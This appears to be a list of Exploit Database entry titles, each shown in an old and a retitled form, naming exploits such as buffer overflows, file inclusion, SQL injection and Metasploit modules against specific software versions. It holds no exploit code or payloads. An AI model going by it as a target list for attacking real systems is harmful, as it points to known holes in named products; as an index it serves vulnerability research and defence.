Novell iPrint 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)
Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Remote Exploit

Apple QTJava - toQTPointer() Arbitrary Memory Access (Metasploit)
Apple QTJava - 'toQTPointer()' Arbitrary Memory Access (Metasploit)

Java - Statement.invoke() Trusted Method Chain Exploit (Metasploit)
Java - 'Statement.invoke()' Trusted Method Chain Exploit (Metasploit)

Mozilla Firefox 3.5 - escape() Return Value Memory Corruption (Metasploit)
Mozilla Firefox 3.5 - 'escape()' Return Value Memory Corruption (Metasploit)

Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution (Metasploit)
Mozilla Suite/Firefox - InstallVersion->compareTo() Code Execution (Metasploit)

Sun Solaris sadmind - adm_build_path() Buffer Overflow (Metasploit)
Sun Solaris sadmind - 'adm_build_path()' Buffer Overflow (Metasploit)

Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (MS07-029) (Metasploit)
Microsoft DNS RPC Service - 'extractQuotedChar()' Overflow 'SMB' (MS07-029) (Metasploit)

Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit)
Firebird Relational Database - 'SVC_attach()' Buffer Overflow (Metasploit)

Firebird Relational Database - isc_create_database() Buffer Overflow (Metasploit)
Firebird Relational Database - 'isc_create_database()' Buffer Overflow (Metasploit)

Firebird Relational Database - isc_attach_database() Buffer Overflow (Metasploit)
Firebird Relational Database - 'isc_attach_database()' Buffer Overflow (Metasploit)

Worldweaver DX Studio Player 3.0.29 - shell.execute() Command Execution (Metasploit)
Worldweaver DX Studio Player 3.0.29 - 'shell.execute()' Command Execution (Metasploit)

Zenturi ProgramChecker ActiveX - Control Arbitrary File Download (Metasploit)
Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit)
CA BrightStor ARCserve Backup - AddColumn() ActiveX Buffer Overflow (Metasploit)
Microsoft Internet Explorer - createTextRange() Code Execution (MS06-013) (Metasploit)
CA BrightStor ARCserve Backup - 'AddColumn()' ActiveX Buffer Overflow (Metasploit)
Microsoft Internet Explorer - 'createTextRange()' Code Execution (MS06-013) (Metasploit)

AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow (Metasploit)
AOL Radio AmpX - ActiveX Control 'ConvertFile()' Buffer Overflow (Metasploit)

NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow (Metasploit)
NCTAudioFile2 2.x - ActiveX Control 'SetFormatLikeSample()' Buffer Overflow (Metasploit)

SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow (Metasploit)
SasCam Webcam Server 2.6.5 - 'Get()' Method Buffer Overflow (Metasploit)

Microsoft DNS RPC Service - extractQuotedChar() TCP Overflow (MS07-029) (Metasploit)
Microsoft DNS RPC Service - 'extractQuotedChar()' TCP Overflow (MS07-029) (Metasploit)

httpdx - h_handlepeer() Function Buffer Overflow (Metasploit)
httpdx - 'h_handlepeer()' Function Buffer Overflow (Metasploit)

CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)
CA CAM (Windows x86) - 'log_security()' Stack Buffer Overflow (Metasploit)

Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow (Metasploit)
Trend Micro ServerProtect 5.58 - 'CreateBinding()' Buffer Overflow (Metasploit)

XtreamerPRO Media-player 2.6.0 / 2.7.0 - Multiple Vulnerabilities
XtreamerPRO Media-player 2.6.0/2.7.0 - Multiple Vulnerabilities

Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit)
Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' Exploit (Metasploit)

CTEK SkyRouter 4200 / 4300 - Command Execution (Metasploit)
CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)

Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit
Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Exploit

LotusCMS 3.0 - eval() Remote Command Execution (Metasploit)
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)

Apache Tomcat - Remote Exploit (PUT Request) and Account Scanner
Apache Tomcat - Account Scanner / 'PUT' Request Remote Exploit

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Remote Code Execution)
Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution

McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Exploit

Mozilla Firefox 8/9 - AttributeChildRemoved() Use-After-Free (Metasploit)
Mozilla Firefox 8/9 - 'AttributeChildRemoved()' Use-After-Free (Metasploit)

RabidHamster R4 - Log Entry sprintf() Buffer Overflow (Metasploit)
RabidHamster R4 - Log Entry 'sprintf()' Buffer Overflow (Metasploit)

Samsung NET-i viewer - Multiple ActiveX BackupToAvi() Remote Overflow (Metasploit)
Samsung NET-i viewer - Multiple ActiveX 'BackupToAvi()' Remote Overflow (Metasploit)

Microsoft IIS 6.0 / 7.5 (+ PHP) - Multiple Vulnerabilities
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities

Linux Kernel 2.0.30 / 2.0.35 / 2.0.36 / 2.0.37 - Blind TCP Spoofing
Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing

ETL Delegate 5.9.x / 6.0.x - Buffer Overflow
ETL Delegate 5.9.x/6.0.x - Buffer Overflow
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (1)
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (3)
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (1)
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (3)

Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Remote Command Execution)
Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution

PHP IRC Bot pbot - eval() Remote Code Execution (Metasploit)
PHP IRC Bot pbot - 'eval()' Remote Code Execution (Metasploit)

Icecast 1.3.7/1.3.8 - print_client() Format String
Icecast 1.3.7/1.3.8 - 'print_client()' Format String
FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow
FreeBSD 4.2-stable ftpd - glob() Buffer Overflow Vulnerabilities
OpenBSD 2.x < 2.8 ftpd - glob() Buffer Overflow
FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - 'glob()' Buffer Overflow
FreeBSD 4.2-stable FTPd - 'glob()' Buffer Overflow Vulnerabilities
OpenBSD 2.x < 2.8 FTPd - 'glob()' Buffer Overflow

Apache Tomcat 3.2.3/3.2.4 - Source.jsp Malformed Request Information Disclosure
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure

Apache Tomcat 3.2.3/3.2.4 - RealPath.jsp Malformed Request Information Disclosure
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure

Working Resources BadBlue 1.7.3 - cleanSearchString() Cross-Site Scripting
Working Resources BadBlue 1.7.3 - 'cleanSearchString()' Cross-Site Scripting

NTR - ActiveX Control StopModule() Remote Code Execution (Metasploit)
NTR - ActiveX Control 'StopModule()' Remote Code Execution (Metasploit)
NTR - ActiveX Control Check() Method Buffer Overflow (Metasploit)
HP Application Lifecycle Management - XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution (Metasploit)
NTR - ActiveX Control 'Check()' Method Buffer Overflow (Metasploit)
HP Application Lifecycle Management - 'XGO.ocx' ActiveX 'SetShapeNodeType()' Remote Code Execution (Metasploit)

ghttpd 1.4.x - Log() Function Buffer Overflow
ghttpd 1.4.x - 'Log()' Function Buffer Overflow

zkfingerd 0.9.1 - say() Format String
zkfingerd 0.9.1 - 'say()' Format String

Linux Kernel 2.0.x / 2.2.x / 2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure
Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure

AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 gethostbyname() - Buffer Overflow
AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Buffer Overflow

Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (2)
Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (2)

BitchX 1.0 - Remote Send_CTCP() Memory Corruption
BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption

PoPToP PPTP 1.0/1.1.x - Negative read() Argument Remote Buffer Overflow
PoPToP PPTP 1.0/1.1.x - Negative 'read()' Argument Remote Buffer Overflow

Invision Power Board (IP.Board) 3.3.4 - Unserialize() PHP Code Execution (Metasploit)
Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit)

NetIQ Privileged User Manager 2.3.1 - ldapagnt_eval() Remote Perl Code Execution (Metasploit)
NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Remote Perl Code Execution (Metasploit)

Valve Software Half-Life Server 1.1.1.0 / 3.1.1.1c1 / 4.1.1.1a - Multiplayer Request Buffer Overflow
Valve Software Half-Life Server 1.1.1.0/3.1.1.1c1/4.1.1.1a - Multiplayer Request Buffer Overflow
WU-FTPD 2.6.2 / 2.6.0 / 2.6.1 - 'realpath()' Off-by-One Buffer Overflow
FreeBSD 4.8 - realpath() Off-by-One Buffer Overflow
WU-FTPD 2.6.0/2.6.1/2.6.2 - 'realpath()' Off-by-One Buffer Overflow
FreeBSD 4.8 - 'realpath()' Off-by-One Buffer Overflow

InduSoft Web Studio - ISSymbol.ocx InternationalSeparator() Heap Overflow (Metasploit)
InduSoft Web Studio - 'ISSymbol.ocx' 'InternationalSeparator()' Heap Overflow (Metasploit)

GNU Anubis 3.6.x/3.9.x - auth.c auth_ident() Function Overflow
GNU Anubis 3.6.x/3.9.x - 'auth.c' 'auth_ident()' Function Overflow

Rlpr 2.0 - msg() Function Multiple Vulnerabilities
Rlpr 2.0 - 'msg()' Function Multiple Vulnerabilities

PHP 4.x/5.0 - Strip_Tags() Function Bypass
PHP 4.x/5.0 - 'Strip_Tags()' Function Bypass

Movable Type 4.2x / 4.3x - Web Upgrade Remote Code Execution (Metasploit)
Movable Type 4.2x/4.3x - Web Upgrade Remote Code Execution (Metasploit)

NullSoft Winamp 2-5 - '.wsz' Remote Code Execution
NullSoft Winamp 2.4 < 5.0.4 - '.wsz' Remote Code Execution

Portable UPnP SDK - unique_service_name() Remote Code Execution (Metasploit)
Portable UPnP SDK - 'unique_service_name()' Remote Code Execution (Metasploit)

Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit)
Novell ZENworks Configuration Management 10 SP3/11 SP2 - Remote Execution (Metasploit)

PHP 4/5 - addslashes() Null Byte Bypass
PHP 4/5 - 'addslashes()' Null Byte Bypass

Smail 3 - Multiple Remote and Local Vulnerabilities
Smail 3 - Multiple Remote/Local Vulnerabilities

SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx Remote Code Execution
SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution

Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit)
Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)

Java Applet - Driver Manager Privileged toString() Remote Code Execution (Metasploit)
Java Applet - Driver Manager Privileged 'toString()' Remote Code Execution (Metasploit)

Oracle Java - storeImageArray() Invalid Array Indexing
Oracle Java - 'storeImageArray()' Invalid Array Indexing

PHP 4.x - tempnam() Function open_basedir Restriction Bypass
PHP 4.x - 'tempnam()' Function open_basedir Restriction Bypass

Oracle Java - IntegerInterleavedRaster.verify() Signed Integer Overflow
Oracle Java - 'IntegerInterleavedRaster.verify()' Signed Integer Overflow

Java - storeImageArray() Invalid Array Indexing (Metasploit)
Java - 'storeImageArray()' Invalid Array Indexing (Metasploit)

Oracle Java - BytePackedRaster.verify() Signed Integer Overflow
Oracle Java - 'BytePackedRaster.verify()' Signed Integer Overflow

Oracle Java - ShortComponentRaster.verify() Memory Corruption
Oracle Java - 'ShortComponentRaster.verify()' Memory Corruption

Apache 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security
Apache 1.3.35/2.0.58/2.2.2 - Arbitrary HTTP Request Headers Security

Python 2.5 - PyLocale_strxfrm Function Remote Information Leak
Python 2.5 - 'PyLocale_strxfrm' Function Remote Information Leak
PHP 4.4.4 - Zip_Entry_Read() Integer Overflow
PHP 5.1.6 - Chunk_Split() Function Integer Overflow
PHP 4.4.4 - 'Zip_Entry_Read()' Integer Overflow
PHP 5.1.6 - 'Chunk_Split()' Function Integer Overflow
PHP 5.1.6 - Imap_Mail_Compose() Function Buffer Overflow
PHP 5.1.6 - Msg_Receive() Memory Allocation Integer Overflow
PHP 5.1.6 - 'Imap_Mail_Compose()' Function Buffer Overflow
PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow

Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit)
Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)

Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow
Ghostscript 8.0.1/8.15 - 'zseticcspace()' Function Buffer Overflow

VideoCharge Studio 2.12.3.685 - GetHttpResponse() MITM Remote Code Execution
VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution

Python socket.recvfrom_into() - Remote Buffer Overflow
Python - 'socket.recvfrom_into()' Remote Buffer Overflow

Vim 'mch_expand_wildcards()' - Heap Based Buffer Overflow
Vim - 'mch_expand_wildcards()' Heap Based Buffer Overflow

Boat Browser 8.0 / 8.0.1 - Remote Code Execution
Boat Browser 8.0/8.0.1 - Remote Code Execution

Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)
Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)

Pro Softnet IDrive Online Backup 3.4.0 - ActiveX SaveToFile() Arbitrary File Overwrite
Pro Softnet IDrive Online Backup 3.4.0 - ActiveX 'SaveToFile()' Arbitrary File Overwrite

RealVNC 4.1.0 / 4.1.1 - Authentication Bypass
RealVNC 4.1.0/4.1.1 - Authentication Bypass

PHP 5.5.33 / 7.0.4 - SNMP Format String
PHP 5.5.33/7.0.4 - SNMP Format String

Cisco ASA Software 8.x / 9.x - IKEv1 and IKEv2 Buffer Overflow
Cisco ASA Software 8.x/9.x - IKEv1 / IKEv2 Buffer Overflow

OpenSSHd 7.2p2 - Username Enumeration
OpenSSH 7.2p2 - Username Enumeration

Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039)
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039)

FreePBX 13 / 14 - Remote Command Execution / Privilege Escalation
FreePBX 13/14 - Remote Command Execution / Privilege Escalation

Subversion 1.6.6 / 1.6.12 - Code Execution
Subversion 1.6.6/1.6.12 - Code Execution

Ansible 2.1.4 / 2.2.1 - Command Execution
Ansible 2.1.4/2.2.1 - Command Execution

Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)
Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)
GIT 1.8.5.6 / 1.9.5 / 2.0.5 / 2.1.4/ 2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)
Ruby on Rails 4.0.x / 4.1.x / 4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit)
GIT 1.8.5.6/1.9.5/2.0.5/2.1.4/2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)
Ruby on Rails 4.0.x/4.1.x/4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit)

Easy File Sharing Web Server 7.2 - GET HTTP Request (PassWD) Buffer Overflow (SEH)

Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)
Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)
UBB.Threads 6.2.x < 6.3x - One Char Brute Force Exploit
vBulletin - LAST.php SQL Injection
UBBCentral UBB.Threads 6.2.x < 6.3x - One Char Brute Force Exploit
vBulletin - 'LAST.php' SQL Injection
phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit
PHP 4.3.9 + phpBB 2.x - Unserialize() Remote Exploit (Compiled)
phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Exploit
PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit (Compiled)

e107 - include() Remote Exploit
e107 - 'include()' Remote Exploit

CuteNews 1.4.0 - Shell Inject Remote Command Execution
CuteNews 1.4.0 - Shell Injection / Remote Command Execution

CuteNews 1.4.1 - Shell Inject Remote Command Execution
CuteNews 1.4.1 - Shell Injection / Remote Command Execution

WebWiz Products 1.0 / 3.06 - Login Bypass (SQL Injection)
WebWiz Products 1.0/3.06 - Login Bypass (SQL Injection)

NOCC Webmail 1.0 - (Local Inclusion) Remote Code Execution
NOCC Webmail 1.0 - Local File Inclusion / Remote Code Execution

4Images 1.7.1 - (Local Inclusion) Remote Code Execution
4Images 1.7.1 - Local File Inclusion / Remote Code Execution

Fast Click 1.1.3 / 2.3.8 - 'show.php' Remote File Inclusion
Fast Click 1.1.3/2.3.8 - 'show.php' Remote File Inclusion

UBB Threads 6.4.x < 6.5.2 - (thispath) Remote File Inclusion
UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion

UBB Threads 5.x / 6.x - Multiple Remote File Inclusion
UBBCentral UBB.Threads 5.x/6.x - Multiple Remote File Inclusion
XMB 1.9.6 Final - basename() Remote Command Execution
PHPay 2.02 - 'nu_mail.inc.php' Remote mail() Injection
XMB 1.9.6 Final - 'basename()' Remote Command Execution
PHPay 2.02 - 'nu_mail.inc.php' 'mail()' Remote Injection

Phaos 0.9.2 - basename() Remote Command Execution
Phaos 0.9.2 - 'basename()' Remote Command Execution

Newsscript 0.5 - Remote File Inclusion / Local File Inclusion
Newsscript 0.5 - Local/Remote File Inclusion

exV2 < 2.0.4.3 - extract() Remote Command Execution
exV2 < 2.0.4.3 - 'extract()' Remote Command Execution

KGB 1.87 - (Local Inclusion) Remote Code Execution
KGB 1.87 - Local File Inclusion / Remote Code Execution

UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution
UBBCentral UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution

Invision Gallery 2.0.7 - readfile() & SQL Injection
Invision Gallery 2.0.7 - 'readfile()' / SQL Injection

Flatnuke 2.5.8 - file() Privilege Escalation / Code Execution
Flatnuke 2.5.8 - 'file()' Privilege Escalation / Code Execution

Invision Gallery 2.0.7 (Linux) - readfile() / SQL Injection
Invision Gallery 2.0.7 (Linux) - 'readfile()' / SQL Injection

Imageview 5 - 'Cookie/index.php' Remote / Local File Inclusion
Imageview 5 - 'Cookie/index.php' Local/Remote File Inclusion

Woltlab Burning Board Lite 1.0.2 - decode_cookie() SQL Injection
Woltlab Burning Board Lite 1.0.2 - 'decode_cookie()' SQL Injection

PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Inject Exploit
PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Injection

Cacti 0.8.6i - cmd.php popen() Remote Injection
Cacti 0.8.6i - 'cmd.php' 'popen()' Remote Injection

P-News 1.16 / 1.17 - 'user.dat' Remote Password Disclosure
P-News 1.16/1.17 - 'user.dat' Remote Password Disclosure
Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (1)
Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (2)
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)

Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (3)
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3)

Jupiter CMS 1.1.5 - 'index.php' Remote / Local File Inclusion
Jupiter CMS 1.1.5 - 'index.php' Local/Remote File Inclusion

PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 exec() eExploit
PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 'exec()' Exploit

MySpeach 3.0.7 - Remote / Local File Inclusion
MySpeach 3.0.7 - Local/Remote File Inclusion

YAAP 1.5 - __autoload() Remote File Inclusion
YAAP 1.5 - '__autoload()' Remote File Inclusion

Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution
Quick.Cart 2.2 - Local/Remote File Inclusion / Remote Code Execution

Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution
Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution

Entertainment CMS - (Local Inclusion) Remote Command Execution
Entertainment CMS - Local File Inclusion / Remote Command Execution

iziContents rc6 - Remote File Inclusion / Local File Inclusion
iziContents rc6 - Local/Remote File Inclusion

PHP Project Management 0.8.10 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities
PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions

Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion
Rayzz Script 2.0 - Local/Remote File Inclusion

SerWeb 2.0.0 dev1 2007-02-20 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities
SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities

SquirrelMail G/PGP Encryption Plugin - deletekey() Command Injection
SquirrelMail G/PGP Encryption Plugin - 'deletekey()' Command Injection

Agares phpAutoVideo 2.21 - Remote / Local File Inclusion
Agares phpAutoVideo 2.21 - Local/Remote File Inclusion

TeamCalPro 3.1.000 - Multiple Remote / Local File Inclusion
TeamCalPro 3.1.000 - Multiple Local/Remote File Inclusions

NetRisk 1.9.7 - Remote / Local File Inclusion
NetRisk 1.9.7 - Local/Remote File Inclusion

AJchat 0.10 - unset() bug SQL Injection
AJchat 0.10 - 'unset()' bug SQL Injection

jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities
jspwiki 2.4.104/2.5.139 - Multiple Vulnerabilities

LookStrike Lan Manager 0.9 - Remote / Local File Inclusion
LookStrike Lan Manager 0.9 - Local/Remote File Inclusion

ExBB 0.22 - Local / Remote File Inclusion
ExBB 0.22 - Local/Remote File Inclusion

HomePH Design 2.10 RC2 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
HomePH Design 2.10 RC2 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

ourvideo CMS 9.5 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
ourvideo CMS 9.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure
Pivot 1.40.5 - Dreamwind 'load_template()' Credentials Disclosure

1024 CMS 1.4.4 - Multiple Remote / Local File Inclusion
1024 CMS 1.4.4 - Multiple Local/Remote File Inclusion

Yourownbux 3.1 / 3.2 Beta - SQL Injection
Yourownbux 3.1/3.2 Beta - SQL Injection

Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection
Ol BookMarks Manager 0.7.5 - Local File Inclusion / Remote File Inclusion / SQL Injection

wotw 5.0 - Local / Remote File Inclusion
wotw 5.0 - Local/Remote File Inclusion

PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion
PHPmyGallery 1.0beta2 - Local/Remote File Inclusion

PHPmyGallery 1.5beta - 'common-tpl-vars.php' Local / Remote File Inclusion
PHPmyGallery 1.5beta - 'common-tpl-vars.php' Local/Remote File Inclusion
ASPSiteWare Automotive Dealer 1.0 / 2.0 - SQL Injection
ASPSiteWare RealtyListing 1.0 / 2.0 - SQL Injection
ASPSiteWare Automotive Dealer 1.0/2.0 - SQL Injection
ASPSiteWare RealtyListing 1.0/2.0 - SQL Injection

phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
phpskelsite 1.4 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

PlaySms 0.9.3 - Multiple Remote / Local File Inclusion
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions

Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass
Simple Machines Forum (SMF) 1.0.13/1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass

phpList 2.10.x - (Remote Code Execution by environ Inclusion) Local File Inclusion
phpList 2.10.x - Remote Code Execution / Local File Inclusion

GNUBoard 4.31.04 (09.01.30) - Multiple Local+Remote Vulnerabilities
GNUBoard 4.31.04 (09.01.30) - Local/Remote Multiple Vulnerabilities

OpenHelpDesk 1.0.100 - eval() Code Execution (Metasploit)
OpenHelpDesk 1.0.100 - 'eval()' Code Execution (Metasploit)

Wili-CMS 0.4.0 - Remote File Inclusion / Local File Inclusion / Authentication Bypass
Wili-CMS 0.4.0 - Local File Inclusion / Remote File Inclusion / Authentication Bypass

PHP Director 0.21 - (SQL into outfile) eval() Injection
PHP Director 0.21 - (SQL Into Outfile) 'eval()' Injection

UBB.Threads 5.5.1 - (message) SQL Injection
UBBCentral UBB.Threads 5.5.1 - 'message' SQL Injection

Geeklog 1.5.2 - SEC_authenticate() SQL Injection
Geeklog 1.5.2 - 'SEC_authenticate()' SQL Injection

WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion
WebPortal CMS 0.8b - Multiple Local/Remote File Inclusions
PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Inject
Bitweaver 2.6 - saveFeed() Remote Code Execution
PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Injection
Bitweaver 2.6 - 'saveFeed()' Remote Code Execution

School Data Navigator - (page) Local / Remote File Inclusion
School Data Navigator - 'page' Local/Remote File Inclusion

phpCollegeExchange 0.1.5c - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
phpCollegeExchange 0.1.5c - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

ClearContent - 'image.php url' Remote File Inclusion / Local File Inclusion
ClearContent - 'image.php url' Local/Remote File Inclusion

e107 Plugin my_gallery 2.4.1 - readfile() Local File Disclosure
e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure

skadate dating - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
skadate dating - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

Ultrize TimeSheet 1.2.2 - readfile() Local File Disclosure
Ultrize TimeSheet 1.2.2 - 'readfile()' Local File Disclosure

aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities
aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass / File Disclosure) Multiple Remote Vulnerabilities
Facil Helpdesk - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities
IsolSoft Support Center 2.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities
Facil Helpdesk - (Local File Inclusion / Remote File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities
IsolSoft Support Center 2.5 - (Local File Inclusion / Remote File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities

ZeroBoard 4.1 pl7 - now_connect() Remote Code Execution
ZeroBoard 4.1 pl7 - 'now_connect()' Remote Code Execution

DedeCMS 5.1 - SQL Injection
DeDeCMS 5.1 - SQL Injection

TwonkyMedia Server 4.4.17 / 5.0.65 - Cross-Site Scripting
TwonkyMedia Server 4.4.17/5.0.65 - Cross-Site Scripting

Xerver 4.31 / 4.32 - HTTP Response Splitting
Xerver 4.31/4.32 - HTTP Response Splitting

sugar crm 5.5.0.rc2 / 5.2.0j - Multiple Vulnerabilities
Sugar CRM 5.5.0.rc2/5.2.0j - Multiple Vulnerabilities

Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion
Quate CMS 0.3.5 - Local/Remote File Inclusion
Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - Local File Inclusion / SQL Injection
UBB.Threads 7.5.4 2 - Multiple File Inclusion
Invision Power Board 2.3.6/3.0.4 - Local File Inclusion / SQL Injection
UBBCentral UBB.Threads 7.5.4 2 - Multiple File Inclusion

NAS Uploader 1.0 / 1.5 - Arbitrary File Upload
NAS Uploader 1.0/1.5 - Arbitrary File Upload

Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection
Pandora FMS Monitoring Application 2.1.x /3.x - SQL Injection

UBB Threads 6.0 - Remote File Inclusion
UBBCentral UBB.Threads 6.0 - Remote File Inclusion

fileNice PHP file browser - Remote File Inclusion / Local File Inclusion
fileNice PHP file browser - Local/Remote File Inclusion

Pay Per Minute Video Chat Script 2.0 / 2.1 - Multiple Vulnerabilities
Pay Per Minute Video Chat Script 2.0/2.1 - Multiple Vulnerabilities

ProfitCode Shopping Cart - Multiple Local File Inclusion / Remote File Inclusion Vulnerabilities
ProfitCode Shopping Cart - Multiple Local/Remote File Inclusion Vulnerabilities

